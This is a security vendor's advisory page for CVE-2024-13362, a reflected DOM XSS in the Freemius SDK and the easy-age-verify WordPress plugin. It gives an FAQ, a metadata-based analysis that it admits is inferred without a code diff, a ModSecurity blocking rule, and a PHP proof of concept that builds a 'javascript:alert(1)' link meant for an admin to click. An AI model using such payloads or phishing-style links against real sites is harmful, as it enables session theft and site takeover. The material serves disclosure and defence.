What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius framework and the easy-age-verify WordPress plugin. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the url parameter, which can execute if a user clicks a specially crafted link.

Who is affected by this vulnerability?

Any WordPress site using the Freemius framework version 2.10.1 or lower, and the easy-age-verify plugin version 1.8.5 or lower, is vulnerable to this issue. Administrators should check their plugin versions and update accordingly to mitigate risk.

How does the vulnerability work?

The vulnerability arises from improper handling of user-supplied input in the url parameter within JavaScript. An attacker can craft a URL containing malicious JavaScript, which is then executed in the victim’s browser when they interact with the affected page.

What are the potential impacts of this vulnerability?

If exploited, this vulnerability can lead to arbitrary JavaScript execution in the context of the victim’s WordPress session. This may allow attackers to steal session cookies, perform unauthorized actions, or redirect users to malicious sites.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Freemius framework and the easy-age-verify plugin on your WordPress site. If they are at or below the specified vulnerable versions, your site is at risk.

What is the CVSS score and what does it mean?

The CVSS score for this vulnerability is 6.1, classified as Medium severity. This indicates a moderate risk level, suggesting that while exploitation may not be trivial, it can lead to significant consequences if successful.

How can I fix this vulnerability?

To fix this vulnerability, update the Freemius framework and the easy-age-verify plugin to their latest versions. Additionally, developers should ensure proper input sanitization and output encoding when handling user-supplied data.

What mitigation strategies can I implement?

In addition to updating plugins, consider implementing a Content Security Policy (CSP) to restrict the execution of scripts. Regularly audit your plugins and themes for vulnerabilities and apply security patches promptly.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can craft a malicious link containing a JavaScript payload in the url parameter. When an administrator clicks the link, the vulnerable JavaScript reads the parameter and executes the attacker’s script.

What are safe coding practices to prevent XSS?

Developers should use safe DOM APIs, such as textContent or createTextNode, instead of innerHTML. Always validate and sanitize user inputs, and apply URL encoding before using input in DOM operations.

How does user interaction play a role in this vulnerability?

User interaction is necessary for exploitation, as the attack relies on tricking a user into clicking a malicious link. Without this action, the attack cannot be executed, which limits the scope of potential exploitation.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately change all administrative passwords, check for unauthorized changes, and restore your site from a clean backup. Conduct a thorough security audit to identify and remediate any vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 6, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (easy-age-verify)

CVE ID CVE-2024-13362

Plugin easy-age-verify

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.8.5

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This reflected DOM-based XSS vulnerability affects the Freemius framework library (version 2.10.1 and below) and any WordPress plugins or themes that bundle it, including the easy-age-verify plugin (vulnerable version 1.8.5). The CVSS score is 6.1 (Medium), with network attack vector, low complexity, no privileges required, and user interaction required.

The root cause, inferred from the CWE-79 classification and description, is improper neutralization of user-supplied input in the url parameter within a JavaScript context. The vulnerable code likely reads the url parameter from the URL query string or the DOM and then injects that value into the page without proper encoding. Since the vulnerability is described as DOM-based, the attacker’s input is processed by client-side JavaScript (not server-side PHP), making it a client-side XSS that executes in the victim’s browser. This conclusion is inferred from the CWE and description; no code diff was available for confirmation.

An attacker can craft a malicious link containing a JavaScript payload in the url parameter, such as ?url=javascript:alert(1). When a logged-in administrator clicks the link, the vulnerable Freemius JavaScript code reads the url parameter and writes it to the DOM without sanitization, executing the attacker’s script. The attack does not require authentication. The specific endpoint varies per plugin; for the easy-age-verify plugin, the vulnerable script may be loaded on any page where the Freemius SDK is active.

Remediation likely requires the developer to properly encode or validate the url parameter before using it in DOM operations. Server-side changes can validate the url against an allowlist of known domains. Client-side changes must use safe DOM APIs (e.g., textContent or createTextNode) instead of innerHTML or document.write, and apply URL encoding via encodeURI() or a similar function before updating location-related properties.

Impact if exploited includes arbitrary JavaScript execution in the context of the victim’s WordPress admin session. An attacker can steal session cookies, perform administrative actions (create new admin users, install malicious plugins), deface the site, or redirect users to phishing pages. The CVSS impact metrics (Low confidentiality, Low integrity) confirm that complete site compromise is possible though not guaranteed, depending on the attacker’s objectives and the victim’s privileges.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected DOM XSS via url parameter on any page containing Freemius SDK.
# Targets the url parameter with javascript: or data: schemes.
SecRule REQUEST_URI "@rx  /" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius url Parameter XSS',severity:'CRITICAL',tag:'CVE-2024-13362'"
SecRule ARGS_GET:url "@rx ^(javascript|data|vbscript):" "t:lowercase,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC targets the easy-age-verify plugin with Freemius SDK embedded.
// It sends a crafted URL with a malicious url parameter to a front page.
// The vulnerable JavaScript reads the url parameter and injects it into the DOM.

$target_url = 'http://example.com'; // Change this to the target WordPress site URL

// JavaScript payload that will execute in the victim's browser
$xss_payload = 'javascript:alert(1)';

// Construct the malicious URL with XSS in the url parameter
$malicious_url = $target_url . '/?url=' . urlencode($xss_payload);

// Output the URL (attacker would trick victim into clicking this link)
echo "Send the following link to an authenticated WordPress admin:n";
echo $malicious_url . "nn";

// Optionally demonstrate via curl - but this is a click-based attack
// We simulate logging the response to verify the payload is reflected
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'AtomicEdge-PoC');
$response = curl_exec($ch);
curl_close($ch);

if ($response === false) {
    die("Error fetching the URL.n");
}

// Check if the payload appears in the response (may be obfuscated by JS)
if (strpos($response, $xss_payload) !== false) {
    echo "[+] Payload reflected in HTML response (likely vulnerable).n";
} else {
    echo "[-] Payload not directly reflected in HTML. Check browser DOM for execution.n";
    echo "    The vulnerability is DOM-based and executes client-side.n";
}

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius framework and the easy-age-verify WordPress plugin. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the url parameter, which can execute if a user clicks a specially crafted link.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Freemius framework version 2.10.1 or lower, and the easy-age-verify plugin version 1.8.5 or lower, is vulnerable to this issue. Administrators should check their plugin versions and update accordingly to mitigate risk.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from improper handling of user-supplied input in the url parameter within JavaScript. An attacker can craft a URL containing malicious JavaScript, which is then executed in the victim’s browser when they interact with the affected page.
What are the potential impacts of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can lead to arbitrary JavaScript execution in the context of the victim’s WordPress session. This may allow attackers to steal session cookies, perform unauthorized actions, or redirect users to malicious sites.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the Freemius framework and the easy-age-verify plugin on your WordPress site. If they are at or below the specified vulnerable versions, your site is at risk.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for this vulnerability is 6.1, classified as Medium severity. This indicates a moderate risk level, suggesting that while exploitation may not be trivial, it can lead to significant consequences if successful.
How can I fix this vulnerability?
Recommended remediation steps
To fix this vulnerability, update the Freemius framework and the easy-age-verify plugin to their latest versions. Additionally, developers should ensure proper input sanitization and output encoding when handling user-supplied data.
What mitigation strategies can I implement?
Additional protective measures
In addition to updating plugins, consider implementing a Content Security Policy (CSP) to restrict the execution of scripts. Regularly audit your plugins and themes for vulnerabilities and apply security patches promptly.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can craft a malicious link containing a JavaScript payload in the url parameter. When an administrator clicks the link, the vulnerable JavaScript reads the parameter and executes the attacker’s script.
What are safe coding practices to prevent XSS?
Best practices for developers
Developers should use safe DOM APIs, such as textContent or createTextNode, instead of innerHTML. Always validate and sanitize user inputs, and apply URL encoding before using input in DOM operations.
How does user interaction play a role in this vulnerability?
Role of user actions in exploitation
User interaction is necessary for exploitation, as the attack relies on tricking a user into clicking a malicious link. Without this action, the attack cannot be executed, which limits the scope of potential exploitation.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect your site has been compromised, immediately change all administrative passwords, check for unauthorized changes, and restore your site from a clean backup. Conduct a thorough security audit to identify and remediate any vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations